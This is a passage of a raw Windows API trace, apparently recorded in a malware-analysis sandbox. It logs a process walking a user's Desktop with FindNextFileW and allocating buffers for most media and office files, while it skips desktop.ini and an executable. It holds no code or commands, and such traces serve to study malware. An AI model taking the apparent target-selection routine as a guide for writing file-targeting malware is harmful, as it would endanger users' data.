ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb4c25900, ftLastAccessTime.dwHighDateTime=0x1d64ac6, ftLastWriteTime.dwLowDateTime=0xb4c25900, ftLastWriteTime.dwHighDateTime=0x1d64ac6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName=".", cAlternateFileName="")) returned 0x70cf40 [0071.711] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb4c25900, ftLastAccessTime.dwHighDateTime=0x1d64ac6, ftLastWriteTime.dwLowDateTime=0xb4c25900, ftLastWriteTime.dwHighDateTime=0x1d64ac6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="..", cAlternateFileName="")) returned 1 [0071.712] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.712] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40abd290, ftCreationTime.dwHighDateTime=0x1d5d96e, ftLastAccessTime.dwLowDateTime=0x67abb480, ftLastAccessTime.dwHighDateTime=0x1d5d943, ftLastWriteTime.dwLowDateTime=0x67abb480, ftLastWriteTime.dwHighDateTime=0x1d5d943, nFileSizeHigh=0x0, nFileSizeLow=0x12376, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="00nFwhgO92Uk.jpg", cAlternateFileName="00NFWH~1.JPG")) returned 1 [0071.712] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.712] lstrlenW (lpString="00nFwhgO92Uk.jpg") returned 16 [0071.712] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc6) returned 0x6f4fd8 [0071.712] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2221d8c0, ftCreationTime.dwHighDateTime=0x1d5e28c, ftLastAccessTime.dwLowDateTime=0x6c7754b0, ftLastAccessTime.dwHighDateTime=0x1d5ddd5, ftLastWriteTime.dwLowDateTime=0x6c7754b0, ftLastWriteTime.dwHighDateTime=0x1d5ddd5, nFileSizeHigh=0x0, nFileSizeLow=0x75c0, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="0kFWpD9J0qyqobsTdcd.wav", cAlternateFileName="0KFWPD~1.WAV")) returned 1 [0071.712] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.712] lstrlenW (lpString="0kFWpD9J0qyqobsTdcd.wav") returned 23 [0071.712] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd4) returned 0x1412548 [0071.712] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbab6e40, ftCreationTime.dwHighDateTime=0x1d5d96b, ftLastAccessTime.dwLowDateTime=0xf7bb5e60, ftLastAccessTime.dwHighDateTime=0x1d5dd33, ftLastWriteTime.dwLowDateTime=0xf7bb5e60, ftLastWriteTime.dwHighDateTime=0x1d5dd33, nFileSizeHigh=0x0, nFileSizeLow=0x11ad1, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="1POeABzlVOMqM-TNqKj.mp4", cAlternateFileName="1POEAB~1.MP4")) returned 1 [0071.712] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.712] lstrlenW (lpString="1POeABzlVOMqM-TNqKj.mp4") returned 23 [0071.712] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd4) returned 0x1412628 [0071.712] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49a207b0, ftCreationTime.dwHighDateTime=0x1d5e234, ftLastAccessTime.dwLowDateTime=0x87885b10, ftLastAccessTime.dwHighDateTime=0x1d5e6e4, ftLastWriteTime.dwLowDateTime=0x87885b10, ftLastWriteTime.dwHighDateTime=0x1d5e6e4, nFileSizeHigh=0x0, nFileSizeLow=0xc240, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="3OVUBNdm6AgJ.pps", cAlternateFileName="3OVUBN~1.PPS")) returned 1 [0071.712] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.712] lstrlenW (lpString="3OVUBNdm6AgJ.pps") returned 16 [0071.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc6) returned 0x70c558 [0071.713] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x619bc30, ftCreationTime.dwHighDateTime=0x1d5da01, ftLastAccessTime.dwLowDateTime=0x273d9fb0, ftLastAccessTime.dwHighDateTime=0x1d5e769, ftLastWriteTime.dwLowDateTime=0x273d9fb0, ftLastWriteTime.dwHighDateTime=0x1d5e769, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="6f3ozAkBxNySU3QQOT", cAlternateFileName="6F3OZA~1")) returned 1 [0071.713] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.713] lstrlenW (lpString="6f3ozAkBxNySU3QQOT") returned 18 [0071.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x1412708 [0071.713] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6f3ozAkBxNySU3QQOT\\*", lpFindFileData=0x1412708 | out: lpFindFileData=0x1412708*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x619bc30, ftCreationTime.dwHighDateTime=0x1d5da01, ftLastAccessTime.dwLowDateTime=0x273d9fb0, ftLastAccessTime.dwHighDateTime=0x1d5e769, ftLastWriteTime.dwLowDateTime=0x273d9fb0, ftLastWriteTime.dwHighDateTime=0x1d5e769, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2fb9b4bf, dwReserved1=0xa97a99f7, cFileName=".", cAlternateFileName="")) returned 0x70bce0 [0071.713] FindNextFileW (in: hFindFile=0x70bce0, lpFindFileData=0x1412708 | out: lpFindFileData=0x1412708*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x619bc30, ftCreationTime.dwHighDateTime=0x1d5da01, ftLastAccessTime.dwLowDateTime=0x273d9fb0, ftLastAccessTime.dwHighDateTime=0x1d5e769, ftLastWriteTime.dwLowDateTime=0x273d9fb0, ftLastWriteTime.dwHighDateTime=0x1d5e769, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2fb9b4bf, dwReserved1=0xa97a99f7, cFileName="..", cAlternateFileName="")) returned 1 [0071.713] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.713] FindNextFileW (in: hFindFile=0x70bce0, lpFindFileData=0x1412708 | out: lpFindFileData=0x1412708*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6f1790, ftCreationTime.dwHighDateTime=0x1d5e213, ftLastAccessTime.dwLowDateTime=0x72ac69b0, ftLastAccessTime.dwHighDateTime=0x1d5e348, ftLastWriteTime.dwLowDateTime=0x72ac69b0, ftLastWriteTime.dwHighDateTime=0x1d5e348, nFileSizeHigh=0x0, nFileSizeLow=0x4a69, dwReserved0=0x2fb9b4bf, dwReserved1=0xa97a99f7, cFileName="ObJT.swf", cAlternateFileName="")) returned 1 [0071.713] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.713] lstrlenW (lpString="ObJT.swf") returned 8 [0071.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xdc) returned 0x1412960 [0071.713] FindNextFileW (in: hFindFile=0x70bce0, lpFindFileData=0x1412708 | out: lpFindFileData=0x1412708*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8da0c120, ftCreationTime.dwHighDateTime=0x1d5e263, ftLastAccessTime.dwLowDateTime=0x97ceb670, ftLastAccessTime.dwHighDateTime=0x1d5e759, ftLastWriteTime.dwLowDateTime=0x97ceb670, ftLastWriteTime.dwHighDateTime=0x1d5e759, nFileSizeHigh=0x0, nFileSizeLow=0x118b0, dwReserved0=0x2fb9b4bf, dwReserved1=0xa97a99f7, cFileName="xXHJMNGsM3NQJ-uKlH.m4a", cAlternateFileName="XXHJMN~1.M4A")) returned 1 [0071.713] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.713] lstrlenW (lpString="xXHJMNGsM3NQJ-uKlH.m4a") returned 22 [0071.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf8) returned 0x1412a48 [0071.714] FindNextFileW (in: hFindFile=0x70bce0, lpFindFileData=0x1412708 | out: lpFindFileData=0x1412708*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8da0c120, ftCreationTime.dwHighDateTime=0x1d5e263, ftLastAccessTime.dwLowDateTime=0x97ceb670, ftLastAccessTime.dwHighDateTime=0x1d5e759, ftLastWriteTime.dwLowDateTime=0x97ceb670, ftLastWriteTime.dwHighDateTime=0x1d5e759, nFileSizeHigh=0x0, nFileSizeLow=0x118b0, dwReserved0=0x2fb9b4bf, dwReserved1=0xa97a99f7, cFileName="xXHJMNGsM3NQJ-uKlH.m4a", cAlternateFileName="XXHJMN~1.M4A")) returned 0 [0071.714] FindClose (in: hFindFile=0x70bce0 | out: hFindFile=0x70bce0) returned 1 [0071.714] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412708 | out: hHeap=0x6d0000) returned 1 [0071.714] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4f48f70, ftCreationTime.dwHighDateTime=0x1d5ddcb, ftLastAccessTime.dwLowDateTime=0x89b4d4c0, ftLastAccessTime.dwHighDateTime=0x1d5e051, ftLastWriteTime.dwLowDateTime=0x89b4d4c0, ftLastWriteTime.dwHighDateTime=0x1d5e051, nFileSizeHigh=0x0, nFileSizeLow=0x9f87, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="8VbFpA.flv", cAlternateFileName="")) returned 1 [0071.714] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.714] lstrlenW (lpString="8VbFpA.flv") returned 10 [0071.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xba) returned 0x1412708 [0071.714] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb5805e0, ftCreationTime.dwHighDateTime=0x1d5e795, ftLastAccessTime.dwLowDateTime=0xa2826e40, ftLastAccessTime.dwHighDateTime=0x1d5e704, ftLastWriteTime.dwLowDateTime=0xa2826e40, ftLastWriteTime.dwHighDateTime=0x1d5e704, nFileSizeHigh=0x0, nFileSizeLow=0xe0f, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="AEu8.mp4", cAlternateFileName="")) returned 1 [0071.714] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.714] lstrlenW (lpString="AEu8.mp4") returned 8 [0071.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb6) returned 0x14127d0 [0071.714] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7bc410, ftCreationTime.dwHighDateTime=0x1d5e64c, ftLastAccessTime.dwLowDateTime=0x63736ca0, ftLastAccessTime.dwHighDateTime=0x1d5dd62, ftLastWriteTime.dwLowDateTime=0x63736ca0, ftLastWriteTime.dwHighDateTime=0x1d5dd62, nFileSizeHigh=0x0, nFileSizeLow=0xc8fe, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="ct8awPWiMCAsR.gif", cAlternateFileName="CT8AWP~1.GIF")) returned 1 [0071.714] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.714] lstrlenW (lpString="ct8awPWiMCAsR.gif") returned 17 [0071.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc8) returned 0x1412890 [0071.715] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.715] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.715] lstrlenW (lpString="desktop.ini") returned 11 [0071.715] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe355e550, ftCreationTime.dwHighDateTime=0x1d5dda4, ftLastAccessTime.dwLowDateTime=0xe97ed710, ftLastAccessTime.dwHighDateTime=0x1d5e2f0, ftLastWriteTime.dwLowDateTime=0xe97ed710, ftLastWriteTime.dwHighDateTime=0x1d5e2f0, nFileSizeHigh=0x0, nFileSizeLow=0x8875, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="FUalO.gif", cAlternateFileName="")) returned 1 [0071.715] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.715] lstrlenW (lpString="FUalO.gif") returned 9 [0071.715] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb8) returned 0x1412b48 [0071.715] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc53abc20, ftCreationTime.dwHighDateTime=0x1d5d98b, ftLastAccessTime.dwLowDateTime=0xc4f58270, ftLastAccessTime.dwHighDateTime=0x1d5da5f, ftLastWriteTime.dwLowDateTime=0xc4f58270, ftLastWriteTime.dwHighDateTime=0x1d5da5f, nFileSizeHigh=0x0, nFileSizeLow=0x3bb8, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="knU8X6jJQ.xls", cAlternateFileName="KNU8X6~1.XLS")) returned 1 [0071.715] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.715] lstrlenW (lpString="knU8X6jJQ.xls") returned 13 [0071.715] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x1412c08 [0071.715] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a3a7680, ftCreationTime.dwHighDateTime=0x1d5dbd2, ftLastAccessTime.dwLowDateTime=0x4dadd710, ftLastAccessTime.dwHighDateTime=0x1d5ddc2, ftLastWriteTime.dwLowDateTime=0x4dadd710, ftLastWriteTime.dwHighDateTime=0x1d5ddc2, nFileSizeHigh=0x0, nFileSizeLow=0x9b94, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="KO XV 0.png", cAlternateFileName="KOXV0~1.PNG")) returned 1 [0071.715] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.715] lstrlenW (lpString="KO XV 0.png") returned 11 [0071.715] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbc) returned 0x1412cd0 [0071.715] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdf97040, ftCreationTime.dwHighDateTime=0x1d5e764, ftLastAccessTime.dwLowDateTime=0x8287aa50, ftLastAccessTime.dwHighDateTime=0x1d5e485, ftLastWriteTime.dwLowDateTime=0x8287aa50, ftLastWriteTime.dwHighDateTime=0x1d5e485, nFileSizeHigh=0x0, nFileSizeLow=0x6009, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="kzr4mcyEP4AwaACGLrE0.mkv", cAlternateFileName="KZR4MC~1.MKV")) returned 1 [0071.715] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.716] lstrlenW (lpString="kzr4mcyEP4AwaACGLrE0.mkv") returned 24 [0071.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x1412d98 [0071.716] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa96d500, ftCreationTime.dwHighDateTime=0x1d64ac6, ftLastAccessTime.dwLowDateTime=0xaa96d500, ftLastAccessTime.dwHighDateTime=0x1d64ac6, ftLastWriteTime.dwLowDateTime=0xa8347b00, ftLastWriteTime.dwHighDateTime=0x1d64ac6, nFileSizeHigh=0x0, nFileSizeLow=0x112f90, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="Launchy.exe", cAlternateFileName="")) returned 1 [0071.716] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.716] lstrlenW (lpString="Launchy.exe") returned 11 [0071.716] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x158d6f50, ftCreationTime.dwHighDateTime=0x1d5e52c, ftLastAccessTime.dwLowDateTime=0x2eb33f20, ftLastAccessTime.dwHighDateTime=0x1d5e485, ftLastWriteTime.dwLowDateTime=0x2eb33f20, ftLastWriteTime.dwHighDateTime=0x1d5e485, nFileSizeHigh=0x0, nFileSizeLow=0x178cb, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="MP6HXq28dNC-6.gif", cAlternateFileName="MP6HXQ~1.GIF")) returned 1 [0071.716] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.716] lstrlenW (lpString="MP6HXq28dNC-6.gif") returned 17 [0071.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc8) returned 0x1412e78 [0071.716] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c5f6d70, ftCreationTime.dwHighDateTime=0x1d5e026, ftLastAccessTime.dwLowDateTime=0xc526f7d0, ftLastAccessTime.dwHighDateTime=0x1d5dff3, ftLastWriteTime.dwLowDateTime=0xc526f7d0, ftLastWriteTime.dwHighDateTime=0x1d5dff3, nFileSizeHigh=0x0, nFileSizeLow=0x2c77, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="o2iZ1.gif", cAlternateFileName="")) returned 1 [0071.716] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.716] lstrlenW (lpString="o2iZ1.gif") returned 9 [0071.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb8) returned 0x718048 [0071.716] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc32b4fa0, ftCreationTime.dwHighDateTime=0x1d5e087, ftLastAccessTime.dwLowDateTime=0xc9195870, ftLastAccessTime.dwHighDateTime=0x1d5e619, ftLastWriteTime.dwLowDateTime=0xc9195870, ftLastWriteTime.dwHighDateTime=0x1d5e619, nFileSizeHigh=0x0, nFileSizeLow=0xa5c, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="oboVmdF0DY0D7mvC.m4a", cAlternateFileName="OBOVMD~1.M4A")) returned 1 [0071.716] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.716] lstrlenW (lpString="oboVmdF0DY0D7mvC.m4a") returned 20 [0071.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xce) returned 0x718108 [0071.717] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8d8a800, ftCreationTime.dwHighDateTime=0x1d5e825, ftLastAccessTime.dwLowDateTime=0x2163cce0, ftLastAccessTime.dwHighDateTime=0x1d5dcce, ftLastWriteTime.dwLowDateTime=0x2163cce0, ftLastWriteTime.dwHighDateTime=0x1d5dcce, nFileSizeHigh=0x0, nFileSizeLow=0x8179, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="PLWx5yD-v08SkcN.csv", cAlternateFileName="PLWX5Y~1.CSV")) returned 1 [0071.717] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.717] lstrlenW (lpString="PLWx5yD-v08SkcN.csv") returned 19 [0071.717] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xcc) returned 0x7181e0 [0071.736] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a6e7d40, ftCreationTime.dwHighDateTime=0x1d5e6e0, ftLastAccessTime.dwLowDateTime=0xe3a91cd0, ftLastAccessTime.dwHighDateTime=0x1d5d7ae, ftLastWriteTime.dwLowDateTime=0xe3a91cd0, ftLastWriteTime.dwHighDateTime=0x1d5d7ae, nFileSizeHigh=0x0, nFileSizeLow=0xd5ba, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="Q n0IQ.bmp", cAlternateFileName="QN0IQ~1.BMP")) returned 1 [0071.738] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.738] lstrlenW (lpString="Q n0IQ.bmp") returned 10 [0071.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xba) returned 0x70c258 [0071.761] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16fe77e0, ftCreationTime.dwHighDateTime=0x1d5dc8e, ftLastAccessTime.dwLowDateTime=0x5d354560, ftLastAccessTime.dwHighDateTime=0x1d5e1ff, ftLastWriteTime.dwLowDateTime=0x5d354560, ftLastWriteTime.dwHighDateTime=0x1d5e1ff, nFileSizeHigh=0x0, nFileSizeLow=0xe7d9, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="QbgQ7ccHvuEJU-.mp4", cAlternateFileName="QBGQ7C~1.MP4")) returned 1 [0071.761] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.761] lstrlenW (lpString="QbgQ7ccHvuEJU-.mp4") returned 18 [0071.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xca) returned 0x70ce28 [0071.761] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c2c620, ftCreationTime.dwHighDateTime=0x1d5e304, ftLastAccessTime.dwLowDateTime=0x3a082a00, ftLastAccessTime.dwHighDateTime=0x1d5d8ed, ftLastWriteTime.dwLowDateTime=0x3a082a00, ftLastWriteTime.dwHighDateTime=0x1d5d8ed, nFileSizeHigh=0x0, nFileSizeLow=0x1260c, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="rvVsEr2gg3T3GhStRnG.avi", cAlternateFileName="RVVSER~1.AVI")) returned 1 [0071.761] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.761] lstrlenW (lpString="rvVsEr2gg3T3GhStRnG.avi") returned 23 [0071.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd4) returned 0x7182b8 [0071.761] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e8af720, ftCreationTime.dwHighDateTime=0x1d5da6d, ftLastAccessTime.dwLowDateTime=0x1e9838c0, ftLastAccessTime.dwHighDateTime=0x1d5e37c, ftLastWriteTime.dwLowDateTime=0x1e9838c0, ftLastWriteTime.dwHighDateTime=0x1d5e37c, nFileSizeHigh=0x0, nFileSizeLow=0x16b7c, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="seJI8-Y tOEM465GJ.mp3", cAlternateFileName="SEJI8-~1.MP3")) returned 1 [0071.761] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.761] lstrlenW (lpString="seJI8-Y tOEM465GJ.mp3") returned 21 [0071.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x718398 [0071.762] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ea3050, ftCreationTime.dwHighDateTime=0x1d5dd9d, ftLastAccessTime.dwLowDateTime=0x20f00e10, ftLastAccessTime.dwHighDateTime=0x1d5d94d, ftLastWriteTime.dwLowDateTime=0x20f00e10, ftLastWriteTime.dwHighDateTime=0x1d5d94d, nFileSizeHigh=0x0, nFileSizeLow=0x8a2c, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="SZkwPiPoa.ppt", cAlternateFileName="SZKWPI~1.PPT")) returned 1 [0071.762] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.762] lstrlenW (lpString="SZkwPiPoa.ppt") returned 13 [0071.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x718470 [0071.762] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65e1e5c0, ftCreationTime.dwHighDateTime=0x1d5df3d, ftLastAccessTime.dwLowDateTime=0xaa1349e0, ftLastAccessTime.dwHighDateTime=0x1d5d8c7, ftLastWriteTime.dwLowDateTime=0xaa1349e0, ftLastWriteTime.dwHighDateTime=0x1d5d8c7, nFileSizeHigh=0x0, nFileSizeLow=0x3dd3, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="tiSxMocb HmQZEi.flv", cAlternateFileName="TISXMO~1.FLV")) returned 1 [0071.762] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.762] lstrlenW (lpString="tiSxMocb HmQZEi.flv") returned 19 [0071.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xcc) returned 0x718538 [0071.762] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d3cab10, ftCreationTime.dwHighDateTime=0x1d5e7e8, ftLastAccessTime.dwLowDateTime=0xd3721420, ftLastAccessTime.dwHighDateTime=0x1d5dfd3, ftLastWriteTime.dwLowDateTime=0xd3721420, ftLastWriteTime.dwHighDateTime=0x1d5dfd3, nFileSizeHigh=0x0, nFileSizeLow=0x6032, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="U-o1QsBEN50.ods", cAlternateFileName="U-O1QS~1.ODS")) returned 1 [0071.762] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.762] lstrlenW (lpString="U-o1QsBEN50.ods") returned 15 [0071.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc4) returned 0x718610 [0071.762] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27a14850, ftCreationTime.dwHighDateTime=0x1d5e70d, ftLastAccessTime.dwLowDateTime=0x9b0b6a10, ftLastAccessTime.dwHighDateTime=0x1d5e2a7, ftLastWriteTime.dwLowDateTime=0x9b0b6a10, ftLastWriteTime.dwHighDateTime=0x1d5e2a7, nFileSizeHigh=0x0, nFileSizeLow=0x10fac, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="unn z0iEwxlgp5Vg OO.avi", 